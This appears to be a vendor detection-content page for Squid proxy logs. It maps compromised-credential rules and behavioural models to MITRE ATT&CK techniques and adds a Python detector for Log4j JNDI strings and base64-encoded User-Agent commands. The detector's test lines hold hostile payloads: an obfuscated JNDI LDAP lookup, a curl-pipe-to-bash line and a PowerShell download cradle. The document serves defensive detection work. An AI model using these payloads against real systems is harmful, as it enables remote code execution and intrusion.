Product: Squid
Use-Case: Compromised Credentials
Rules | Models | MITRE ATT&CK® TTPs | Activity Types | Parsers |
---|---|---|---|---|
40 | 22 | 12 | 2 | 5 |
Event Type: web-activity-allowed

Rules (grouped by MITRE ATT&CK technique):

T1190 - Exploit Public-Facing Application
↳ A-WEB-Mime-Types-Org-F: First occurrence of this MIME type on this asset for organization
↳ A-WEB-Base64CommandUserAgent: User agent with encoded commands was detected from this web activity.
↳ A-WEB-Log4j-String-2: There was an attempt via web activity to exploit the CVE-2021-44228 vulnerability using known keywords on the asset.

T1071 - Application Layer Protocol
↳ WEB-UUa-OS-F: First web activity using this operating system for this user
↳ WEB-GUa-OS-F: First web activity using this operating system for the peer group
↳ WEB-OUa-OS-F: First web activity using this operating system for the organization
↳ WEB-UUa-MobileBrowser-F: First activity using this mobile web browser/app for this user to a new domain
↳ WEB-OsUa-MobileBrowser-F: First activity using this mobile web browser for this mobile operating system
↳ WEB-UUa-Browser-F: First activity using this web browser for this user to a new domain
↳ WEB-GUa-Browser-F: First activity using this web browser for the peer group
↳ WEB-OUa-Browser-F: First activity using this web browser for the organization
↳ WEB-UD-Reputation-F: First access to this web domain which has been identified as risky by a reputation feed.
↳ WEB-UD-Reputation-A: Abnormal access to this web domain which has been identified as risky by a reputation feed.
↳ WEB-UI-Reputation-F: First access to this internet IP address which has been identified as risky by a reputation feed.
↳ WEB-UI-Reputation-A: Abnormal access to this IP address which has been identified as risky by a reputation feed.
↳ WEB-UD-ALERT-A: Abnormal security alert accessing this malicious domain for user
↳ WEB-UD-ALERT-N: Common security alert on this malicious domain for user
↳ WEB-UT-TOW-A: Abnormal day for this user to access the web via the organization
↳ WEB-UZ-F: First web activity for this user in this zone
↳ WEB-GZ-F: First web activity from this zone for the peer group
↳ WEB-OZ-F: First web activity from this zone for the organization
↳ WEB-ALERT-EXEC: Security violation by Executive in web activity
↳ WEB-URank-F: First web activity to this low ranked web domain
↳ WEB-URank-A: Abnormal web activity to this low ranked web domain
↳ WEB-IP-COUNTRY-A: Abnormal direct access to an IP address belonging to an abnormal country for user to access
↳ A-WEB-HA-F: First web activity event on asset
↳ A-WEB-DC: Web activity event on a Domain Controller
↳ A-WEB-IP-Country-F: Asset has directly browsed to an IP address in a country never before accessed
↳ A-WEB-IP-Country-A: Abnormal direct access to an IP address by the asset belonging to an abnormal country for the asset to access
↳ A-NET-HCountry-Outbound-WEB-F: First web connection to this country from asset
↳ A-NET-HCountry-Outbound-WEB-A: Abnormal web browsing communication country for asset
↳ A-NET-OCountry-Outbound-WEB-F: First web browsing connection to this country from organization
↳ A-NET-OCountry-Outbound-WEB-A: Abnormal web browsing connection country for the organization

T1071.001 - Application Layer Protocol: Web Protocols
↳ The same 30 rules listed under T1071 above (each is mapped to both the technique and this sub-technique).

T1102 - Web Service
↳ A-WEB-DC: Web activity event on a Domain Controller

T1189 - Drive-by Compromise
↳ WEB-URank-Binary: Executable download from first low ranked web domain

T1204 - User Execution
↳ WEB-URank-Binary: Executable download from first low ranked web domain

T1204.001 - User Execution: Malicious Link
↳ WEB-URank-Binary: Executable download from first low ranked web domain

T1566 - Phishing
↳ WEB-URank-Binary: Executable download from first low ranked web domain

T1566.002 - Phishing: Spearphishing Link
↳ WEB-URank-Binary: Executable download from first low ranked web domain

T1078 - Valid Accounts
↳ WEB-ALERT-EXEC: Security violation by Executive in web activity

T1568 - Dynamic Resolution
↳ WEB-UD-DGA-A: Abnormal access to this domain which has been identified as DGA

T1568.002 - Dynamic Resolution: Domain Generation Algorithms
↳ WEB-UD-DGA-A: Abnormal access to this domain which has been identified as DGA

Models:
• A-WEB-Mime-Types-Src: Web activity MIME types for asset in organization
• A-NET-OCountry-Outbound: Outbound country per organization
• A-NET-HCountry-Outbound: Outbound country per asset
• A-WEB-IP: IPs an asset has directly browsed to
• A-WEB-HA: Web activity per host
• WEB-URank: Web activity to low ranked domains for the user
• WEB-OZ: Network zones where users perform web activity in the organization
• WEB-GZ: Network zones where users perform web activity in the peer group
• WEB-UZ: Network zones where a user performs web activity from
• WEB-UT-TOW: Web activity time for user
• WEB-UD-ALERT: Top malicious web domains accessed by the user
• WEB-UI-Reputation: Top IP addresses flagged by a reputation service that have been accessed by the user
• WEB-UD-Reputation: Top web domains flagged by a reputation service that have been accessed by the user
• WEB-OUa-Browser-New: Top web browsers being used in this organization
• WEB-GUa-Browser-New: Top web browsers being used by peer group
• WEB-UUa-Browser-New: Top web browsers being used by user
• WEB-OsUa-MobileBrowser-New: Top mobile apps/web browsers being used in the organization for this type of device
• WEB-UUa-MobileBrowser-New: Top mobile apps/web browsers being used by user
• WEB-OUa-OS-New: Top operating systems being used to connect to the web for organization
• WEB-GUa-OS-New: Top operating systems being used to connect to the web for peer group
• WEB-UUa-OS-New: Top operating systems being used to connect to the web for user
• WEB-UD-DGA: Top web domains per user that seem to be DGA generated during web activity

Event Type: web-activity-denied

Rules (grouped by MITRE ATT&CK technique):

T1190 - Exploit Public-Facing Application
↳ A-WEB-Mime-Types-Org-F: First occurrence of this MIME type on this asset for organization
↳ A-WEB-Base64CommandUserAgent: User agent with encoded commands was detected from this web activity.
↳ A-WEB-Log4j-String-2: There was an attempt via web activity to exploit the CVE-2021-44228 vulnerability using known keywords on the asset.

T1071 - Application Layer Protocol
↳ WEB-UD-Reputation-F: First access to this web domain which has been identified as risky by a reputation feed.
↳ WEB-UD-Reputation-A: Abnormal access to this web domain which has been identified as risky by a reputation feed.
↳ WEB-UI-Reputation-F: First access to this internet IP address which has been identified as risky by a reputation feed.
↳ WEB-UI-Reputation-A: Abnormal access to this IP address which has been identified as risky by a reputation feed.
↳ WEB-UD-ALERT-A: Abnormal security alert accessing this malicious domain for user
↳ WEB-UD-ALERT-N: Common security alert on this malicious domain for user
↳ WEB-UT-TOW-A: Abnormal day for this user to access the web via the organization
↳ WEB-UZ-F: First web activity for this user in this zone
↳ WEB-GZ-F: First web activity from this zone for the peer group
↳ WEB-OZ-F: First web activity from this zone for the organization
↳ WEB-ALERT-EXEC: Security violation by Executive in web activity
↳ WEB-URank-F: First web activity to this low ranked web domain
↳ WEB-URank-A: Abnormal web activity to this low ranked web domain
↳ WEB-IPF-Country-F: User has failed trying to directly browse to an IP address belonging to a country never before accessed
↳ A-WEB-HA-F: First web activity event on asset
↳ A-WEB-DC: Web activity event on a Domain Controller
↳ A-WEBF-IP-Country-F: Asset failed to directly connect to an IP address in a country never before accessed
↳ A-WEBF-IP-Country-A: Abnormal direct access to an IP address by the asset belonging to an abnormal country for the asset to access has failed
↳ A-NETF-HCountry-Outbound-WEB-F: First failed web browsing connection to this country from asset
↳ A-NETF-HCountry-Outbound-WEB-A: Web browsing connection to abnormal country for asset has failed

T1071.001 - Application Layer Protocol: Web Protocols
↳ The same 20 rules listed under T1071 above (each is mapped to both the technique and this sub-technique).

T1102 - Web Service
↳ A-WEB-DC: Web activity event on a Domain Controller

T1189 - Drive-by Compromise
↳ WEB-URank-Binary: Executable download from first low ranked web domain

T1204 - User Execution
↳ WEB-URank-Binary: Executable download from first low ranked web domain

T1204.001 - User Execution: Malicious Link
↳ WEB-URank-Binary: Executable download from first low ranked web domain

T1566 - Phishing
↳ WEB-URank-Binary: Executable download from first low ranked web domain

T1566.002 - Phishing: Spearphishing Link
↳ WEB-URank-Binary: Executable download from first low ranked web domain

T1078 - Valid Accounts
↳ WEB-ALERT-EXEC: Security violation by Executive in web activity

T1568 - Dynamic Resolution
↳ WEB-UD-DGA-A: Abnormal access to this domain which has been identified as DGA

T1568.002 - Dynamic Resolution: Domain Generation Algorithms
↳ WEB-UD-DGA-A: Abnormal access to this domain which has been identified as DGA

Models:
• A-WEB-Mime-Types-Src: Web activity MIME types for asset in organization
• A-NET-HCountry-Outbound: Outbound country per asset
• A-WEB-IP: IPs an asset has directly browsed to
• A-WEB-HA: Web activity per host
• WEB-URank: Web activity to low ranked domains for the user
• WEB-OZ: Network zones where users perform web activity in the organization
• WEB-GZ: Network zones where users perform web activity in the peer group
• WEB-UZ: Network zones where a user performs web activity from
• WEB-UT-TOW: Web activity time for user
• WEB-UD-ALERT: Top malicious web domains accessed by the user
• WEB-UI-Reputation: Top IP addresses flagged by a reputation service that have been accessed by the user
• WEB-UD-Reputation: Top web domains flagged by a reputation service that have been accessed by the user
• WEB-UD-DGA: Top web domains per user that seem to be DGA generated during web activity
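The two signature-style T1190 rules in the tables above, A-WEB-Base64CommandUserAgent and A-WEB-Log4j-String-2, say what they look for but not how a Squid log line gets there. The following is an added illustration written for this page; it is not Exabeam's rule logic and not Squid code. It parses Squid's built-in "combined" logformat (the default native format carries no User-Agent), strips Log4j lookup wrappers and URL encoding before matching the `${jndi:...}` keyword, and decodes base64 runs in the User-Agent to look for shell or PowerShell command tokens. The sample lines, RFC 5737 addresses, user names and the rule labels `jndi-lookup-string` / `encoded-command-user-agent` are constructed for this example. It goes slightly beyond the page's "known keywords" wording by also handling `${lower:}` / `${::-}` obfuscation and UTF-16LE `-EncodedCommand` payloads.

```python
from __future__ import annotations

import base64
import binascii
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Squid's built-in "combined" logformat (from squid.conf). The default native format
# has no User-Agent field, so UA-based checks need a logformat like this one:
#   %>a %[ui %[un [%tl] "%rm %ru HTTP/%rv" %>Hs %<st "%{Referer}>h" "%{User-Agent}>h" %Ss:%Sh
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) HTTP/(?P<version>[\d.]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" '
    r'(?P<result>\S+)$'
)

# Log4j lookup wrappers used to break up the keyword: ${lower:j}, ${upper:N}, ${::-d}
_WRAPPER_RE = re.compile(r'\$\{(?:(?:lower|upper):|::-)([^${}]*)\}', re.I)
# The keyword itself once wrappers are gone; URI schemes seen in CVE-2021-44228 payloads
_JNDI_RE = re.compile(r'\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nis|nds|https?)\b', re.I)

# Base64-looking runs in a User-Agent, and command tokens to look for after decoding
_B64_RUN_RE = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')
_CMD_RE = re.compile(r'(?:^|[\s;|&`(])(?:bash|sh|zsh|curl|wget|nc|ncat|python3?|perl|powershell|'
                     r'pwsh|cmd(?:\.exe)?|certutil|chmod|iex|invoke-expression)\b', re.I)


def normalize_lookup(text: str) -> str:
    """URL-decode (twice, for double encoding) and peel lookup wrappers until stable."""
    text = unquote(unquote(text))
    while True:
        peeled = _WRAPPER_RE.sub(r'\1', text)
        if peeled == text:
            return text
        text = peeled


def has_jndi_lookup(*fields: str) -> bool:
    """True if any field carries a ${jndi:<scheme>...} lookup, obfuscated or not."""
    return any(_JNDI_RE.search(normalize_lookup(f)) for f in fields)


def _as_text(raw: bytes) -> str | None:
    """Decode as ASCII, then UTF-16LE (PowerShell -EncodedCommand); require printable text."""
    for enc in ('ascii', 'utf-16-le'):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text and all(c.isprintable() or c in '\t\r\n' for c in text):
            return text
    return None


def find_encoded_commands(user_agent: str) -> list[str]:
    """Return decoded base64 blobs from the UA that contain a shell/PowerShell command token."""
    hits = []
    for m in _B64_RUN_RE.finditer(user_agent):
        token = m.group(0)
        token += '=' * (-len(token) % 4)  # tolerate stripped padding
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue
        text = _as_text(raw)
        if text and _CMD_RE.search(text):
            hits.append(text)
    return hits


@dataclass
class Finding:
    client: str
    user: str
    rule: str    # hypothetical labels for this example, not Exabeam rule names
    detail: str


def analyze(line: str) -> list[Finding]:
    """Run both checks over one Squid 'combined' log line; unparseable lines yield nothing."""
    m = COMBINED_RE.match(line)
    if not m:
        return []
    findings = []
    if has_jndi_lookup(m['url'], m['referer'], m['ua']):
        findings.append(Finding(m['client'], m['user'], 'jndi-lookup-string', unquote(m['url'])))
    for cmd in find_encoded_commands(m['ua']):
        findings.append(Finding(m['client'], m['user'], 'encoded-command-user-agent', cmd))
    return findings


# Constructed sample lines (RFC 5737 test addresses), not real log data: benign browsing,
# an obfuscated JNDI lookup in a denied URL, a base64 shell one-liner and a UTF-16LE
# PowerShell payload smuggled in the User-Agent.
_B64_CURL = base64.b64encode(b"curl http://198.51.100.7/a.sh | bash").decode()
_B64_PS = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p')".encode('utf-16-le')
).decode()
SAMPLE_LINES = [
    '10.0.0.12 - jsmith [10/Oct/2023:13:55:36 +0000] "GET http://www.example.com/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" TCP_MISS:HIER_DIRECT',
    '10.0.0.23 - - [10/Oct/2023:13:56:01 +0000] "GET http://intranet.example/index.php?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.5%3A1389%2Fa%7D HTTP/1.1" 403 0 "-" "python-requests/2.31.0" TCP_DENIED:HIER_NONE',
    f'10.0.0.44 - svc_build [10/Oct/2023:13:57:12 +0000] "GET http://198.51.100.7/beacon HTTP/1.1" 200 88 "-" "Mozilla/5.0 {_B64_CURL}" TCP_MISS:HIER_DIRECT',
    f'10.0.0.44 - svc_build [10/Oct/2023:13:57:40 +0000] "GET http://198.51.100.7/p HTTP/1.1" 200 1402 "-" "WinHttp {_B64_PS}" TCP_MISS:HIER_DIRECT',
]

if __name__ == '__main__':
    for line in SAMPLE_LINES:
        for f in analyze(line):
            print(f'{f.client} {f.user} {f.rule}: {f.detail}')
```

Two practitioner notes. First, the second sample is a `TCP_DENIED` line: Squid still logs requests it blocks, which is why the web-activity-denied table above carries the same T1190 rules as the allowed one. Second, `%[un` is `-` unless proxy authentication (`auth_param`) is configured, so user-keyed rules such as WEB-UD-Reputation-F degrade to asset-level attribution without it. The base64 check will occasionally decode a legitimate long alphanumeric token to printable text, so the command-token match is what keeps the false-positive rate usable; tune `_CMD_RE` to the shells actually present in the estate.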